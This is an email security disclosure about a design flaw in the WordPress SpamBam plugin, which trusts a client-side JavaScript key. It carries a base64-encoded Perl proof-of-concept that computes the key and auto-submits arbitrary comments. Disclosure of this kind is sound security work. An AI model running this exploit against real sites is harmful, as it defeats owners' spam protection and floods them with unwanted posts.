|
This is a multi-part message in MIME format.
--------------020903050506090400050704
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
The attached exploit demonstrates that the WordPress SpamBam plugin can
be bypassed due to relying on the client for security.
Vulnerable software:
SpamBam (http://wordpress.org/extend/plugins/spambam/) by Gareth Heyes
Vulnerability:
No matter how hard you ofuscate or encrypt your code, never, under no
circunstances, rely any security aspect on the client. Never!
How the plugin works:
It generates a pseudo-random code both on the client and the server to
generate a key.
On form submit, both key values are checked and they should match to
allow comment insertion.
How the exploit works:
It does nothing but acting as a client. It parses the html, extracts
the javascript, process it to calculate the key and fills the hidden
field with it.
Solution:
There's no fix for this. It's a design flaw.
--------------020903050506090400050704
Content-Type: text/plain; x-mac-type="0"; x-mac-creator="0";
name="spambam.pl"
Content-Transfer-Encoding: base64
Content-Disposition: inline;
filename="spambam.pl"
IyEvdXNyL2Jpbi9wZXJsIC13CgojIERlZmVhdGluZyBTcGFtQmFtIGV4cGxvaXQKIyBieSBK
b3NlIFBhbGF6b24gKGpvc2VtLnBhbGF6b25AZ21haWwuY29tKSAoYS5rLmEuIHBhbGFrbykK
CiMgVnVsbmVyYWJsZSBzb2Z0d2FyZToKIyBTcGFtQmFtIChodHRwOi8vd29yZHByZXNzLm9y
Zy9leHRlbmQvcGx1Z2lucy9zcGFtYmFtLykgYnkgR2FyZXRoIEhleWVzCgojIFZ1bG5lcmFi
aWxpdHk6CiMgTm8gbWF0dGVyIGhvdyBoYXJkIHlvdSBvZnVzY2F0ZSBvciBlbmNyeXB0IHlv
dXIgY29kZSwgbmV2ZXIsIHVuZGVyIG5vIGNpcmN1bnN0YW5jZXMsIHJlbHkKIyBhbnkgc2Vj
dXJpdHkgYXNwZWN0IG9uIHRoZSBjbGllbnQuIE5ldmVyIQoKIyBIb3cgdGhlIHBsdWdpbiB3
b3JrczoKIyBJdCBnZW5lcmF0ZXMgYSBwc2V1ZG8tcmFuZG9tIGNvZGUgYm90aCBvbiB0aGUg
Y2xpZW50IGFuZCB0aGUgc2VydmVyIHRvIGdlbmVyYXRlIGEga2V5LgojIE9uIGZvcm0gc3Vi
bWl0LCBib3RoIGtleSB2YWx1ZXMgYXJlIGNoZWNrZWQgYW5kIHRoZXkgc2hvdWxkIG1hdGNo
IHRvIGFsbG93IGNvbW1lbnQgaW5zZXJ0aW9uLgoKI0hvdyB0aGUgZXhwbG9pdCB3b3JrczoK
IyBJdCBkb2VzIG5vdGhpbmcgYnV0IGFjdGluZyBhcyBhIGNsaWVudC4gSXQgcGFyc2VzIHRo
ZSBodG1sLCBleHRyYWN0cyB0aGUgamF2YXNjcmlwdCwgcHJvY2VzcyBpdAojIHRvIGNhbGN1
bGF0ZSB0aGUga2V5IGFuZCBmaWxscyB0aGUgaGlkZGVuIGZpZWxkIHdpdGggaXQuCgojIFNv
bHV0aW9uOgojIFNvcnJ5IGd1eXMgYnV0IHRoZXJlJ3Mgbm8gZml4IGZvciB0aGlzLiBJdCdz
cyBqdXN0IGEgZGVzaWduIGZsYXcuCgp1c2UgV1dXOjpNZWNoYW5pemU7CnVzZSBKYXZhU2Ny
aXB0OjpTcGlkZXJNb25rZXk7CgpteSAkdG1wQ29udGVudDsKbXkgJGphdmFzY3JpcHRDb2Rl
OwpteSAkc3BhbUJhbUtleTsKCmRpZSAoIlVzYWdlOiBzcGFtYmFtLnBsIDxwb3N0IHVybD4g
PGF1dGhvcj4gPGVtYWlsPiA8Y29tbWVudD5cbiIpIHVubGVzcyAkQVJHVlszXTsKCm15ICR1
cmwgPSAkQVJHVlswXTsKbXkgJGF1dGhvciA9ICRBUkdWWzFdOwpteSAkZW1haWwgPSAkQVJH
VlsyXTsKbXkgJGNvbW1lbnQgPSAkQVJHVlszXTsKCm15ICRtZWNoID0gV1dXOjpNZWNoYW5p
emUtPm5ldyggYXV0b2NoZWNrID0+IDEgKTsKCiRtZWNoLT5nZXQoJHVybCk7CgojIFdXVzo6
TWVjaGFuaXplIGRvZXNuJ3Qgc3VwcG9ydCBqYXZhc2NyaXB0LCBzbyB0aGUgZmllbGQgY29t
bWVudF9zcGFtYmFtS2V5IHdvbid0IGJlCiMgcmVjb2duaXplZCBieSAkbWVjaC0+ZmllbGQu
IFRodXMsIEknbGwgbWFrZSBhbiB1cGRhdGVfaHRtbCBhZGRpbmcgdGhlIGZpZWxkLCBhbmQg
Zm9yCiMgdGhpcyBwdXJwb3NlIEkgc2F2ZSBmaXJzdCB0aGUgb3JpZ2luYWwgY29udGVudHMu
IEluZGVlZCwgc3Vic3RpdGl0aW9uIG9jY3VycyB2aWEgdGhlCiMgamF2YXNjcmlwdCBjYWxs
YmFjayBmdW5jdGlvbiAiZXh0cmFjdEtleSIKJHRtcENvbnRlbnQgPSAkbWVjaC0+Y29udGVu
dDsKCgojIEVsaW1pbmF0ZSBjYXJyaWFnZSByZXR1cm5zIHRvIGFwcGx5IHNlZC4gTGF0ZXIg
SSdsbCBoYXZlIHRvIHJlc3RvcmUgdGhlbQojIHRvIGV4ZWN1dGUgdGhlIGphdmFzY3JpcHQg
Y29kZSwgYXMgbm90IGV2ZXJ5IGxpbmUgaXMgc2VtaWNvbG9uIHRlcm1pbmF0ZWQuCiMgVGhh
dCdzIHRoZSByZWFzb24gb2YgdGhlIF9fV0hPX0JBTVNfV0hPX18gc3RyaW5nLgokXyA9ICRt
ZWNoLT5jb250ZW50OwpzL1xuL19fV0hPX0JBTVNfV0hPX18vZzsgCgojIEV4dHJhY3QgdGhl
IGphdmFzY3JpcHQgY29kZSBhbmQgdGhlIG5hbWUgb2YgdGhlIHZhcmlhYmxlIHdoZXJlIHRo
ZSBrZXkgaXMgZ29pbmcgdG8gYmUgY2FsY3VsYXRlZAovPHNjcmlwdCB0eXBlPSJ0ZXh0XC9q
YXZhc2NyaXB0Ij4oLiopZG9jdW1lbnRcLndyaXRlXCgnPGlucHV0IHR5cGU9ImhpZGRlbiIg
bmFtZT0iY29tbWVudF9zcGFtYmFtS2V5IiB2YWx1ZT0iJ1wrKC4qKVwrJyI+J1wpOy9nOyAK
JGphdmFzY3JpcHRDb2RlID0gJDE7CiRzcGFtQmFtS2V5ID0gJDI7CgojIEFkZCB0aGUgamF2
YXNjcmlwdCBpbnN0cnVjdGlvbiAgd2hpY2ggd2lsbCBjb211bmljYXRlIHRoZSBrZXkgdG8g
dGhlIHBlcmwgY29kZS4KJGphdmFzY3JpcHRDb2RlIC49ICJcbmV4dHJhY3RLZXkoJHNwYW1C
YW1LZXkpOyI7CgpteSAkanMgPSBKYXZhU2NyaXB0OjpTcGlkZXJNb25rZXktPm5ldygpOwok
anMtPmluaXQoKTsgICMgSW5pdGlhbGl6ZSBSdW50aW1lL0NvbnRleHQKCiMgRGVmaW5lIHBl
cmwgY2FsbGJhY2sgZm9yIGV4dHJhY3RpbmcgdGhlIGtleSBmcm9tIHRoZSBqYXZhc2NyaXB0
IGNvZGUKJGpzLT5mdW5jdGlvbl9zZXQoImV4dHJhY3RLZXkiLCBzdWIgeyAkdG1wQ29udGVu
dCA9fiBzLzxcL2Zvcm0+LzxpbnB1dCB0eXBlPVwiaGlkZGVuXCIgbmFtZT1cImNvbW1lbnRf
c3BhbWJhbUtleVwiIHZhbHVlPVwiQF9cIj48XC9mb3JtPi87IH0pOwoKIyBSZXN0b3JlIENh
cnJpYWdlIHJldHVybnMgYW5kIGV4ZWN1dGUgamF2YXNjcmlwdCBjb2RlCiRqYXZhc2NyaXB0
Q29kZSA9fiBzL19fV0hPX0JBTVNfV0hPX18vXG4vZzsKbXkgJHJjID0gJGpzLT5ldmFsKCRq
YXZhc2NyaXB0Q29kZSk7IAokanMtPmRlc3Ryb3koKTsKCiMgUHJvY2VzcyBmb3JtCiRtZWNo
LT51cGRhdGVfaHRtbCggJHRtcENvbnRlbnQgKTsKJG1lY2gtPmZvcm1fbnVtYmVyKDEpOwok
bWVjaC0+ZmllbGQoImF1dGhvciIsICRhdXRob3IpOwokbWVjaC0+ZmllbGQoImVtYWlsIiwg
JGVtYWlsKTsKJG1lY2gtPmZpZWxkKCJjb21tZW50IiwgJGNvbW1lbnQpOwokbWVjaC0+c3Vi
bWl0KCk7CgpwcmludGYoIkNoZWNrIGl0LiBDb21tZW50IHNob3VsZCBoYXZlIGJlZW4gYWRk
ZWRcbiIpOwo--------------020903050506090400050704--